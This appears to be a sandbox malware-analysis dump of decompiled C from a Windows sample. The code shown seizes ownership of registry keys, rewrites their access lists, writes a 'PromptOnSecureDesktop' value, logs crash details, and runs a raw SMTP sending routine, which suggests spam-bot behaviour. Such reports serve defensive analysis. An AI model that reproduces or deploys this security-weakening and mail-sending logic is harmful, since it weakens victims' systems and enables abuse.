0x0040b2fa
0x0040b2fd
0x0040b2fd
0x0040b31a
0x0040b31a
0x0040b323
0x0040b329
0x0040b32f
0x0040b338
0x0040b33a
0x0040b33a
0x0040b33d
0x0040b341
0x0040b344
0x0040b34b
0x0040b34f
0x0040b350
0x0040b350
0x0040b358
0x0040b35d
0x0040b35d
0x0040b366
0x0040b36a
0x0040b36b
0x0040b36b
0x0040b371
0x0040b376
0x0040b378
0x0040b378
0x0040b37f
0x0040b380
0x0040b3c4

APIs

GetLocalTime.KERNEL32(0003E800,?,0003E800,00000000), ref: 0040B2B3
FileTimeToLocalFileTime.KERNEL32(00000000,00000000,?,0003E800,00000000), ref: 0040B2C2
FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B2D0
SystemTimeToFileTime.KERNEL32(0003E800,00000000), ref: 0040B2E1
FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B31A
GetTimeZoneInformation.KERNEL32(?), ref: 0040B329
wsprintfA.USER32 ref: 0040B3B7

Strings

Dec, xrefs: 0040B2A3
Oct, xrefs: 0040B295
Wed, xrefs: 0040B23A
Feb, xrefs: 0040B25D
Jan, xrefs: 0040B256
Apr, xrefs: 0040B26B
Sat, xrefs: 0040B24F
Sun, xrefs: 0040B225
May, xrefs: 0040B272
Tue, xrefs: 0040B233
Thu, xrefs: 0040B241
Nov, xrefs: 0040B29C
Jul, xrefs: 0040B280
%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u, xrefs: 0040B3AF
Jun, xrefs: 0040B279
Fri, xrefs: 0040B248
Aug, xrefs: 0040B287
Sep, xrefs: 0040B28E
Mar, xrefs: 0040B264
Mon, xrefs: 0040B22C

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: Time$File$System$Local$InformationZonewsprintf
String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
API String ID: 766114626-2976066047
Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
Instruction ID: 3cccae2c5b68faf9d5e65ebc3321ef0303f497beb4f825406ae493c25d793f5b
Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
Instruction Fuzzy Hash: D8510EB1D0021CAADF18DFD5D8495EEBBB9EF48304F10856BE501B6250E7B84AC9CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00407A95, Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 269
registrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E00407A95(void* _a4, char* _a8, signed int _a12) {
				int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				struct _ACL* _v32;
				long _v36;
				long _v40;
				long _v44;
				int _v48;
				int _v52;
				union _SID_NAME_USE _v56;
				int _v60;
				int _v64;
				void _v132;
				char _v388;
				char _v516;
				struct _SECURITY_DESCRIPTOR _v1540;
				void* _t95;
				void* _t104;
				void* _t107;
				void* _t111;
				void* _t116;
				struct _ACL* _t117;
				void* _t118;
				void* _t120;
				void* _t122;
				void* _t123;
				void* _t125;
				char* _t126;
				void* _t130;
				void* _t134;
				void* _t135;
				signed int _t136;
				void* _t143;
				void* _t146;
				void* _t148;
				int _t151;
				void** _t159;
				void* _t161;
				void* _t164;
				signed int _t172;
				void* _t173;
				char* _t174;
				void* _t175;
				void* _t176;

				_v32 = 0;
				_v12 = 0;
				_v28 = 0;
				if(RegOpenKeyExA(_a4, _a8, 0, 0xe0100,  &_v28) != 0) {
					return 0;
				}
				_v40 = 0x80;
				_t95 = GetUserNameA( &_v388,  &_v40);
				__eflags = _t95;
				if(_t95 == 0) {
					L48:
					RegCloseKey(_v28);
					return _v12;
				} else {
					_v36 = 0x44;
					_v44 = 0x80;
					_t104 = LookupAccountNameA(0,  &_v388,  &_v132,  &_v36,  &_v516,  &_v44,  &_v56);
					__eflags = _t104;
					if(_t104 == 0) {
						goto L48;
					}
					_v48 = 0x400;
					_t107 = RegGetKeySecurity(_v28, 5,  &_v1540,  &_v48);
					__eflags = _t107;
					if(_t107 != 0) {
						goto L48;
					}
					_t111 = GetSecurityDescriptorOwner( &_v1540,  &_v16,  &_v60);
					__eflags = _t111;
					if(_t111 == 0) {
						L12:
						_v24 = 0;
						_t116 = GetSecurityDescriptorDacl( &_v1540,  &_v64,  &_v32,  &_v52);
						__eflags = _t116;
						if(_t116 == 0) {
							L47:
							goto L48;
						}
						_t117 = _v32;
						__eflags = _t117;
						if(_t117 == 0) {
							goto L47;
						}
						_t164 = 0;
						_v8 = 0;
						__eflags = 0 - _t117->AceCount;
						if(0 >= _t117->AceCount) {
							goto L47;
						} else {
							goto L15;
						}
						do {
							L15:
							_t118 = GetAce(_t117, _v8,  &_v20);
							__eflags = _t118;
							if(_t118 == 0) {
								L31:
								_t73 =  &_v8;
								 *_t73 = _v8 + 1;
								__eflags =  *_t73;
								goto L32;
							}
							_t172 = 0;
							_v16 = _v20 + 8;
							__eflags = _t164;
							if(_t164 <= 0) {
								L21:
								__eflags = _t164 - 0x20;
								if(_t164 < 0x20) {
									 *((intOrPtr*)(_t176 + _t164 * 4 - 0x100)) = _v16;
									_t164 = _t164 + 1;
									__eflags = _t164;
								}
								_t134 = EqualSid( &_v132, _v16);
								_t159 = _v20;
								__eflags = _t134;
								if(_t134 == 0) {
									_t135 = 0x20000;
								} else {
									asm("sbb eax, eax");
									_t135 = ( ~_a12 & 0x00010006) + 0xe0039;
								}
								__eflags = _t159[1] - _t135;
								if(_t159[1] != _t135) {
									_t159[1] = _t135;
									_t159 = _v20;
									_v24 = 1;
								}
								__eflags =  *_t159;
								if( *_t159 != 0) {
									L30:
									 *_t159 = 0;
									_t136 = _v16;
									__eflags =  *(_t136 + 8);
									_t68 =  *(_t136 + 8) == 0;
									__eflags = _t68;
									_v24 = 1;
									 *((char*)(_v20 + 1)) = 2 + (_t136 & 0xffffff00 | _t68) * 8;
									goto L31;
								} else {
									__eflags = _t159[0] & 0x00000010;
									if((_t159[0] & 0x00000010) == 0) {
										goto L31;
									}
									goto L30;
								}
							} else {
								goto L17;
							}
							while(1) {
								L17:
								_t143 = EqualSid( *(_t176 + _t172 * 4 - 0x100), _v16);
								__eflags = _t143;
								if(_t143 != 0) {
									break;
								}
								_t172 = _t172 + 1;
								__eflags = _t172 - _t164;
								if(_t172 < _t164) {
									continue;
								}
								break;
							}
							__eflags = _t172 - _t164;
							if(_t172 >= _t164) {
								goto L21;
							}
							DeleteAce(_v32, _v8);
							_v24 = 1;
							L32:
							_t117 = _v32;
							__eflags = _v8 - (_t117->AceCount & 0x0000ffff);
						} while (_v8 < (_t117->AceCount & 0x0000ffff));
						__eflags = _v24;
						if(_v24 == 0) {
							goto L47;
						}
						__eflags =  *0x4121a8; // 0x0
						if(__eflags == 0) {
							L41:
							_v12 = 1;
							_t173 = LocalAlloc(0x40, 0x14);
							__eflags = _t173;
							if(_t173 != 0) {
								_t120 = InitializeSecurityDescriptor(_t173, 1);
								__eflags = _t120;
								if(_t120 != 0) {
									_t122 = SetSecurityDescriptorDacl(_t173, 1, _v32, 0);
									__eflags = _t122;
									if(_t122 != 0) {
										_t123 = RegSetKeySecurity(_v28, 4, _t173);
										__eflags = _t123;
										if(_t123 == 0) {
											_v12 = 1;
										}
									}
								}
								LocalFree(_t173);
							}
							goto L47;
						}
						__eflags =  *0x412cc0; // 0x0
						if(__eflags == 0) {
							goto L41;
						}
						_v12 = 0;
						_t125 = RegOpenKeyExA(_a4, _a8, 0, 0x103,  &_v12);
						__eflags = _t125;
						if(_t125 != 0) {
							goto L41;
						}
						_t126 = 0x4121a8;
						_t83 =  &(_t126[1]); // 0x4121a9
						_t174 = _t83;
						do {
							_t161 =  *_t126;
							_t126 =  &(_t126[1]);
							__eflags = _t161;
						} while (_t161 != 0);
						_t130 = RegSetValueExA(_v12, E00402544("PromptOnSecureDesktop", 0x4106dc, 0xa, 0xe4, 0xc8), 0, 2, 0x4121a8, _t126 - _t174 + 1);
						__eflags = _t130;
						if(_t130 == 0) {
							 *0x412cc0 = 0;
						}
						goto L41;
					}
					_t146 = EqualSid( &_v132, _v16);
					__eflags = _t146;
					if(_t146 != 0) {
						goto L12;
					}
					_v12 = 1;
					_t175 = LocalAlloc(0x40, 0x14);
					__eflags = _t175;
					if(_t175 != 0) {
						_t148 = InitializeSecurityDescriptor(_t175, 1);
						__eflags = _t148;
						if(_t148 != 0) {
							_t151 = SetSecurityDescriptorOwner(_t175,  &_v132, 0);
							__eflags = _t151;
							if(_t151 != 0) {
								RegSetKeySecurity(_v28, 1, _t175);
							}
						}
						LocalFree(_t175);
					}
					goto L12;
				}
			}

0x00407aae
0x00407ab4
0x00407ab7
0x00407ac2
0x00000000
0x00407ac4
0x00407adc
0x00407adf
0x00407ae5
0x00407ae7
0x00407da7
0x00407daa
0x00000000
0x00407aed
0x00407b0c
0x00407b13
0x00407b16
0x00407b1c
0x00407b1e
0x00000000
0x00000000
0x00407b34
0x00407b3b
0x00407b41
0x00407b43
0x00000000
0x00000000
0x00407b59
0x00407b5f
0x00407b61
0x00407bb8
0x00407bcb
0x00407bce
0x00407bd4
0x00407bd6
0x00407da6
0x00000000
0x00407da6
0x00407bdc
0x00407bdf
0x00407be1
0x00000000
0x00000000
0x00407be9
0x00407beb
0x00407bee
0x00407bf2
0x00000000
0x00000000
0x00000000
0x00000000
0x00407bf8
0x00407bf8
0x00407c00
0x00407c06
0x00407c08
0x00407cc6
0x00407cc6
0x00407cc6
0x00407cc6
0x00000000
0x00407cc6
0x00407c14
0x00407c16
0x00407c19
0x00407c1b
0x00407c4f
0x00407c4f
0x00407c52
0x00407c57
0x00407c5e
0x00407c5e
0x00407c5e
0x00407c66
0x00407c6c
0x00407c6f
0x00407c71
0x00407c86
0x00407c73
0x00407c78
0x00407c7f
0x00407c7f
0x00407c8b
0x00407c8e
0x00407c90
0x00407c93
0x00407c96
0x00407c96
0x00407c9d
0x00407c9f
0x00407ca7
0x00407ca7
0x00407ca9
0x00407cac
0x00407cb2
0x00407cb2
0x00407cb5
0x00407cc3
0x00000000
0x00407ca1
0x00407ca1
0x00407ca5
0x00000000
0x00000000
0x00000000
0x00407ca5
0x00000000
0x00000000
0x00000000
0x00407c1d
0x00407c1d
0x00407c27
0x00407c2d
0x00407c2f
0x00000000
0x00000000
0x00407c31
0x00407c32
0x00407c34
0x00000000
0x00000000
0x00000000
0x00407c34
0x00407c36
0x00407c38
0x00000000
0x00000000
0x00407c40
0x00407c46
0x00407cc9
0x00407cc9
0x00407cd0
0x00407cd0
0x00407cd9
0x00407cdc
0x00000000
0x00000000
0x00407ce2
0x00407ce8
0x00407d5a
0x00407d61
0x00407d6a
0x00407d6c
0x00407d6e
0x00407d72
0x00407d78
0x00407d7a
0x00407d82
0x00407d88
0x00407d8a
0x00407d92
0x00407d98
0x00407d9a
0x00407d9c
0x00407d9c
0x00407d9a
0x00407d8a
0x00407da0
0x00407da0
0x00000000
0x00407d6e
0x00407cea
0x00407cf0
0x00000000
0x00000000
0x00407cff
0x00407d05
0x00407d0b
0x00407d0d
0x00000000
0x00000000
0x00407d14
0x00407d16
0x00407d16
0x00407d19
0x00407d19
0x00407d1b
0x00407d1c
0x00407d1c
0x00407d4a
0x00407d50
0x00407d52
0x00407d54
0x00407d54
0x00000000
0x00407d52
0x00407b6a
0x00407b70
0x00407b72
0x00000000
0x00000000
0x00407b7b
0x00407b84
0x00407b86
0x00407b88
0x00407b8c
0x00407b92
0x00407b94
0x00407b9c
0x00407ba2
0x00407ba4
0x00407bab
0x00407bab
0x00407ba4
0x00407bb2
0x00407bb2
0x00000000
0x00407b88

APIs

RegOpenKeyExA.ADVAPI32(000000E4,00000022,00000000,000E0100,00000000,00000000), ref: 00407ABA
GetUserNameA.ADVAPI32(?,?), ref: 00407ADF
LookupAccountNameA.ADVAPI32(00000000,?,?,0041070C,?,004133B0,?), ref: 00407B16
RegGetKeySecurity.ADVAPI32(00000000,00000005,?,?), ref: 00407B3B
GetSecurityDescriptorOwner.ADVAPI32(?,00000022,80000002), ref: 00407B59
EqualSid.ADVAPI32(?,00000022), ref: 00407B6A
LocalAlloc.KERNEL32(00000040,00000014), ref: 00407B7E
RtlEncodePointer.NTDLL(00000000), ref: 00407B8C
SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407B9C
RegSetKeySecurity.ADVAPI32(00000000,00000001,00000000), ref: 00407BAB
LocalFree.KERNEL32(00000000), ref: 00407BB2
GetSecurityDescriptorDacl.ADVAPI32(?,00407FC9,?,00000000), ref: 00407BCE

Strings

PromptOnSecureDesktop, xrefs: 00407D39
D, xrefs: 00407B0C

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEncodeEqualFreeLookupOpenPointerUser
String ID: D$PromptOnSecureDesktop
API String ID: 127100002-1403908072
Opcode ID: 3ec8af033fe1f594e24f96e4e5a24a1b59b9dd27cd2a73636fe0172ee341a0d8
Instruction ID: e17c9e5f60e255820364911aa1186e0accab4a2e7248257c6285c946b731c67d
Opcode Fuzzy Hash: 3ec8af033fe1f594e24f96e4e5a24a1b59b9dd27cd2a73636fe0172ee341a0d8
Instruction Fuzzy Hash: 6FA14D71D04219ABDB119FA0DD44EEF7B78FF48304F04807AE505F2290D779AA85CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00406511, Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00406511(void* __ecx) {
				signed int _t75;
				signed int _t76;
				int _t78;
				void* _t83;
				signed int _t93;
				void* _t95;
				signed int _t99;
				int _t101;
				int _t115;
				int _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t122;
				intOrPtr _t135;
				intOrPtr* _t137;
				void* _t139;
				void* _t141;
				void* _t143;
				void* _t144;
				void* _t152;

				_t122 = __ecx;
				_t139 = _t141 - 0x74;
				_t75 =  *(_t139 + 0x7c);
				_t135 =  *((intOrPtr*)(_t75 + 4));
				_t76 =  *_t75;
				 *(_t139 + 0x7c) = _t76;
				_t78 = wsprintfA(_t139 - 0x898, "\nver=%d date=%s %s\nc=%08x a=%p", 0x61, "Jan 13 2018", "12:08:32",  *_t76,  *((intOrPtr*)(_t76 + 0xc)));
				_t143 = _t141 - 0x90c + 0x1c;
				_t117 = _t78;
				if(IsBadReadPtr( *( *(_t139 + 0x7c) + 0xc), 8) != 0) {
					E0040E318();
					ExitProcess(0);
				}
				_t83 =  *( *(_t139 + 0x7c) + 0xc);
				__imp__#8( *((intOrPtr*)(_t83 + 4)), E00406511);
				__imp__#8();
				_t118 = _t117 + wsprintfA(_t139 + _t117 - 0x898, " va=%08X%08X uef=%p",  *( *(_t139 + 0x7c) + 0xc),  *( *( *(_t139 + 0x7c) + 0xc)), _t83);
				_t119 = _t118 + wsprintfA(_t139 + _t118 - 0x898, "\n_ax=%p\t_bx=%p\t_cx=%p\t_dx=%p\t_si=%p\t_di=%p\t_bp=%p\t_sp=%p\n",  *((intOrPtr*)(_t135 + 0xb0)),  *((intOrPtr*)(_t135 + 0xa4)),  *((intOrPtr*)(_t135 + 0xac)),  *((intOrPtr*)(_t135 + 0xa8)),  *((intOrPtr*)(_t135 + 0xa0)),  *((intOrPtr*)(_t135 + 0x9c)),  *((intOrPtr*)(_t135 + 0xb4)),  *((intOrPtr*)(_t135 + 0xc4)));
				E0040EE2A(_t122, _t139 - 0x98, 0, 0x108);
				_t144 = _t143 + 0x48;
				 *((intOrPtr*)(_t139 - 0x98)) =  *((intOrPtr*)(_t135 + 0xb8));
				_t93 = 3;
				_push(0);
				_push(0);
				 *(_t139 - 0x8c) = _t93;
				 *((intOrPtr*)(_t139 - 0x94)) = 0;
				_push(0);
				 *(_t139 - 0x5c) = _t93;
				_push(0);
				 *((intOrPtr*)(_t139 - 0x68)) =  *((intOrPtr*)(_t135 + 0xc4));
				 *((intOrPtr*)(_t139 - 0x64)) = 0;
				_t130 =  *((intOrPtr*)(_t135 + 0xb4));
				 *(_t139 - 0x6c) = _t93;
				 *(_t139 + 0x7c) = _t93;
				_push(_t135);
				_push(_t139 - 0x98);
				 *((intOrPtr*)(_t139 - 0x78)) =  *((intOrPtr*)(_t135 + 0xb4));
				 *((intOrPtr*)(_t139 - 0x74)) = 0;
				_push(0);
				while(1) {
					_t95 = GetCurrentProcess();
					__imp__StackWalk64(0x14c, _t95);
					if(_t95 == 0) {
						break;
					}
					_t95 = 0;
					if( *(_t139 + 0x7c) != 0) {
						if( *((intOrPtr*)(_t139 - 0x88)) != 0) {
							_t115 = wsprintfA(_t139 + _t119 - 0x898, "ret=%p\tp1=%p\tp2=%p\tp3=%p\tp4=%p\n",  *((intOrPtr*)(_t139 - 0x88)),  *((intOrPtr*)(_t139 - 0x40)),  *((intOrPtr*)(_t139 - 0x38)),  *((intOrPtr*)(_t139 - 0x30)),  *((intOrPtr*)(_t139 - 0x28)));
							_t144 = _t144 + 0x1c;
							_t119 = _t119 + _t115;
							_t95 = 0;
						}
						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) - 1;
						_push(_t95);
						_push(_t95);
						_push(_t95);
						_push(_t95);
						_push(_t135);
						_push(_t139 - 0x98);
						_push(_t95);
						continue;
					}
					break;
				}
				 *(_t139 + 0x7c) = _t95;
				_t120 = _t119 + wsprintfA(_t139 + _t119 - 0x898, "plgs:");
				 *(_t139 + 0x70) =  *(_t139 + 0x70) & 0x00000000;
				do {
					_t137 = 0x412c40 +  *(_t139 + 0x70) * 4;
					if( *_t137 != 0) {
						_t99 =  *(_t139 + 0x7c) & 0x80000007;
						if(_t99 < 0) {
							_t152 = (_t99 - 0x00000001 | 0xfffffff8) + 1;
						}
						if(_t152 == 0) {
							_t120 = _t120 + wsprintfA(_t139 + _t120 - 0x898, "\n");
						}
						_t101 = wsprintfA(_t139 + _t120 - 0x898, "\t%d=%p",  *(_t139 + 0x70),  *_t137);
						_t144 = _t144 + 0x10;
						_t120 = _t120 + _t101;
						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) + 1;
					}
					 *(_t139 + 0x70) =  *(_t139 + 0x70) + 1;
				} while ( *(_t139 + 0x70) < 0x20);
				wsprintfA(_t139 + _t120 - 0x898, "\n");
				E0040E8A1(_t130, 1, "localcfg", "except_info", _t139 - 0x898);
				E0040E318();
				return 1;
			}

0x00406511
0x00406512
0x0040651c
0x00406521
0x00406524
0x00406532
0x0040654d
0x0040654f
0x00406552
0x00406564
0x0040674e
0x00406755
0x00406755
0x0040656d
0x00406578
0x00406587
0x004065a3
0x004065e3
0x004065ee
0x004065f9
0x00406600
0x00406606
0x00406607
0x00406608
0x00406609
0x0040660f
0x0040661b
0x0040661c
0x0040661f
0x00406620
0x00406623
0x00406626
0x0040662c
0x0040662f
0x00406632
0x00406639
0x0040663a
0x0040663d
0x00406640
0x0040668a
0x0040668a
0x00406696
0x0040669e
0x00000000
0x00000000
0x00406643
0x00406648
0x00406650
0x00406671
0x00406673
0x00406676
0x00406678
0x00406678
0x0040667a
0x0040667d
0x0040667e
0x0040667f
0x00406680
0x00406681
0x00406688
0x00406689
0x00000000
0x00406689
0x00000000
0x00406648
0x004066a0
0x004066b3
0x004066b5
0x004066ba
0x004066bd
0x004066c7
0x004066cc
0x004066d1
0x004066d7
0x004066d7
0x004066d8
0x004066eb
0x004066eb
0x004066ff
0x00406701
0x00406704
0x00406706
0x00406706
0x00406709
0x0040670c
0x0040671f
0x00406734
0x0040673c
0x0040674b

APIs

wsprintfA.USER32 ref: 0040654D
IsBadReadPtr.KERNEL32(?,00000008), ref: 0040655C
htonl.WS2_32(?), ref: 00406578
htonl.WS2_32(?), ref: 00406587
wsprintfA.USER32 ref: 0040659B
wsprintfA.USER32 ref: 004065DC
wsprintfA.USER32 ref: 00406671
GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040668A
StackWalk64.DBGHELP(0000014C,00000000), ref: 00406696
wsprintfA.USER32 ref: 004066B0
wsprintfA.USER32 ref: 004066E7
wsprintfA.USER32 ref: 004066FF
wsprintfA.USER32 ref: 0040671F
ExitProcess.KERNEL32 ref: 00406755

Strings

12:08:32, xrefs: 00406535
va=%08X%08X uef=%p, xrefs: 00406595
Jan 13 2018, xrefs: 0040653A
localcfg, xrefs: 0040672D
plgs:, xrefs: 004066AA
ret=%pp1=%pp2=%pp3=%pp4=%p, xrefs: 0040666B
ver=%d date=%s %sc=%08x a=%p, xrefs: 00406547
%d=%p, xrefs: 004066F9
_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p, xrefs: 004065D6
except_info, xrefs: 00406728

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: wsprintf$Processhtonl$CurrentExitReadStackWalk64
String ID: %d=%p$_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p$ver=%d date=%s %sc=%08x a=%p$ va=%08X%08X uef=%p$12:08:32$Jan 13 2018$except_info$localcfg$plgs:$ret=%pp1=%pp2=%pp3=%pp4=%p
API String ID: 2400214276-165278494
Opcode ID: fbd2438e5a8d786474603689893f321f2aaf39c813a77a2b8649c1733411c7dd
Instruction ID: d0bbb1ce902d37c6012dbda67fcae0275dd4f0eb650f6cdd038f268f1af807dd
Opcode Fuzzy Hash: fbd2438e5a8d786474603689893f321f2aaf39c813a77a2b8649c1733411c7dd
Instruction Fuzzy Hash: FC615F72940208EFDB609FB4DC45FEA77E9FF08300F24846AF95DD2161DA7599908F58

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7C1, Relevance: 38.8, APIs: 8, Strings: 14, Instructions: 299
networkstringCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E0040A7C1(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16) {
				short _v129;
				char _v132;
				char _v1156;
				signed int _t59;
				int _t60;
				void* _t61;
				char* _t62;
				void* _t63;
				void* _t65;
				void* _t82;
				void* _t96;
				intOrPtr _t102;
				char _t103;
				void* _t104;
				int _t121;
				intOrPtr _t123;
				void* _t124;
				CHAR* _t125;
				intOrPtr* _t126;
				intOrPtr* _t127;
				void* _t129;
				void* _t130;
				void* _t131;

				_t102 = _a8;
				_t2 = _t102 - 1; // 0x0
				_t59 = _t2;
				_t125 =  &_v132;
				if(_t59 > 0xb) {
					L21:
					_t60 = lstrlenA(_t125);
					_t121 = _t60;
					_t126 = __imp__#19;
					_t61 =  *_t126(_a4, _t125, _t121, 0);
					if(_t61 == _t121) {
						if(_t102 != 6) {
							L28:
							_t127 = __imp__#16;
							_t103 = 0;
							_push(0);
							_v1156 = 0;
							_v132 = 0;
							_push(0x3f6);
							_t62 =  &_v1156;
							while(1) {
								_t63 =  *_t127(_a4, _t62);
								if(_t63 <= 0) {
									break;
								}
								_t103 = _t103 + _t63;
								if(_t103 > 0x1f4) {
									wsprintfA(_a16, "Too big smtp respons (%d bytes)\n", _t103);
									_push(6);
									L72:
									_pop(_t65);
									return _t65;
								}
								 *((char*)(_t130 + _t103 - 0x480)) = 0;
								if(_v132 != 0) {
									L33:
									if(E0040EE95( &_v1156,  &_v132) != 0) {
										break;
									}
									L34:
									_push(0);
									_push(0x3f6 - _t103);
									_t62 = _t130 + _t103 - 0x480;
									continue;
								}
								if(_t103 <= 3) {
									goto L34;
								}
								E0040EE08( &_v132,  &_v1156, 4);
								_t131 = _t131 + 0xc;
								_v129 = 0x20;
								if(_v132 == 0) {
									goto L34;
								}
								goto L33;
							}
							_t123 = _a8;
							if(_t123 == 7) {
								L23:
								_push(2);
								goto L72;
							}
							if(_t103 <= 5) {
								E0040EF00(_a16, "Too small respons\n");
							} else {
								E0040EE08(_a16,  &_v1156, 0x76);
								_t131 = _t131 + 0xc;
								_a16[0x76] = 0;
							}
							if(_t103 < 5 ||  *((char*)(_t130 + _t103 - 0x481)) != 0xa) {
								E0040EF00(_a16, "Incorrect respons");
								_push(7);
							} else {
								_t104 = E0040EDAC( &_v1156);
								if(_t104 == 0xdc || _t104 == 0xfa || _t104 == 0x162 || _t104 == 0xdd || _t104 == 0x14e || _t104 == 0xeb) {
									_t129 = 1;
									 *0x413668 = E0040EE95( &_v1156, "ESMTP") & 0xffffff00 | _t74 != 0x00000000;
									_t123 = 1;
								} else {
									_t129 = 0;
								}
								if(_t123 != 0xc || _t104 != 0x217) {
									if(_t129 != 0) {
										goto L23;
									}
									_t76 =  *0x413630;
									if( *0x413630 == 0 ||  *0x413634 == _t129 ||  *0x413638 == _t129) {
										L70:
										_push(0xb);
									} else {
										if(_t123 != 4 || E0040A699( &_v1156, _t76) == 0) {
											if(E0040A699( &_v1156,  *0x413634) == 0) {
												if(E0040A699( &_v1156,  *0x413638) == 0) {
													if(_t123 == 3 || _t123 == 4 || _t123 == 5 || _t123 == 6) {
														_t82 = E0040E819(1, "localcfg", "ip", E004030B5());
														_push( &_v132);
														if(E0040EE95( &_v1156, E0040A7A3(_t82, _t82)) != 0) {
															goto L62;
														}
													}
													goto L70;
												}
												_push(0xa);
												goto L72;
											}
											L62:
											_push(9);
										} else {
											_push(8);
										}
									}
								} else {
									_push(0xf);
								}
							}
							goto L72;
						}
						_t124 = 5;
						_t96 =  *_t126(_a4, "\r\n.\r\n", _t124, 0);
						if(_t96 == _t124) {
							goto L28;
						}
						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t96, _t124);
						return _t124;
					}
					if(_t102 != 7) {
						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t61, _t121);
						_push(5);
						goto L72;
					}
					goto L23;
				}
				switch( *((intOrPtr*)(_t59 * 4 +  &M0040AB51))) {
					case 0:
						goto L28;
					case 1:
						_push(_a12);
						_t100 =  &_v132;
						if( *0x413668 == 0) {
							_push("helo %s\r\n");
						} else {
							_push("ehlo %s\r\n");
						}
						goto L4;
					case 2:
						_push(_a12);
						_push("mail from:<%s>\r\n");
						goto L14;
					case 3:
						_push(_a12);
						_push("rcpt to:<%s>\r\n");
						L14:
						__eax =  &_v132;
						L4:
						wsprintfA(_t100, ??);
						goto L20;
					case 4:
						_push(7);
						_push("data\r\n");
						goto L19;
					case 5:
						goto L21;
					case 6:
						_push(7);
						_push("quit\r\n");
						goto L19;
					case 7:
						goto L21;
					case 8:
						_push(0xd);
						_push("AUTH LOGIN\r\n");
						L19:
						__eax =  &_v132;
						_push( &_v132);
						__eax = E0040EE08();
						goto L20;
					case 9:
						__eax = _a12;
						_t9 = __eax + 1; // 0x1
						__edx = _t9;
						do {
							__cl =  *__eax;
							__eax = __eax + 1;
						} while (__cl != 0);
						goto L9;
					case 0xa:
						__eax = _a12;
						_t15 = __eax + 1; // 0x1
						__edx = _t15;
						do {
							__cl =  *__eax;
							__eax = __eax + 1;
						} while (__cl != 0);
						L9:
						__eax = __eax - __edx;
						 *((char*)(__ebp + __eax - 0x80)) = 0;
						L20:
						_t131 = _t131 + 0xc;
						goto L21;
				}
			}

0x0040a7cb
0x0040a7cf
0x0040a7cf
0x0040a7d3
0x0040a7d9
0x0040a87d
0x0040a87e
0x0040a886
0x0040a88d
0x0040a893
0x0040a897
0x0040a8c2
0x0040a8f2
0x0040a8f2
0x0040a8f8
0x0040a8fa
0x0040a900
0x0040a906
0x0040a909
0x0040a90a
0x0040a978
0x0040a97c
0x0040a980
0x00000000
0x00000000
0x0040a912
0x0040a91a
0x0040a9b9
0x0040a9c2
0x0040ab4a
0x0040ab4a
0x00000000
0x0040ab4a
0x0040a924
0x0040a92c
0x0040a954
0x0040a968
0x00000000
0x00000000
0x0040a96a
0x0040a96e
0x0040a970
0x0040a971
0x00000000
0x0040a971
0x0040a931
0x00000000
0x00000000
0x0040a940
0x0040a945
0x0040a94c
0x0040a952
0x00000000
0x00000000
0x00000000
0x0040a952
0x0040a982
0x0040a988
0x0040a89e
0x0040a89e
0x00000000
0x0040a89e
0x0040a991
0x0040a9d1
0x0040a993
0x0040a99f
0x0040a9a7
0x0040a9aa
0x0040a9aa
0x0040a9db
0x0040ab41
0x0040ab48
0x0040a9ef
0x0040a9fb
0x0040aa04
0x0040aa40
0x0040aa4d
0x0040aa52
0x0040aa2e
0x0040aa2e
0x0040aa2e
0x0040aa57
0x0040aa6a
0x00000000
0x00000000
0x0040aa70
0x0040aa77
0x0040ab35
0x0040ab35
0x0040aa95
0x0040aa98
0x0040aaca
0x0040aae6
0x0040aaef
0x0040ab12
0x0040ab1a
0x0040ab33
0x00000000
0x00000000
0x0040ab33
0x00000000
0x0040aaef
0x0040aae8
0x00000000
0x0040aae8
0x0040aacc
0x0040aacc
0x0040aaad
0x0040aaad
0x0040aaad
0x0040aa98
0x0040aa61
0x0040aa61
0x0040aa61
0x0040aa57
0x00000000
0x0040a9db
0x0040a8c8
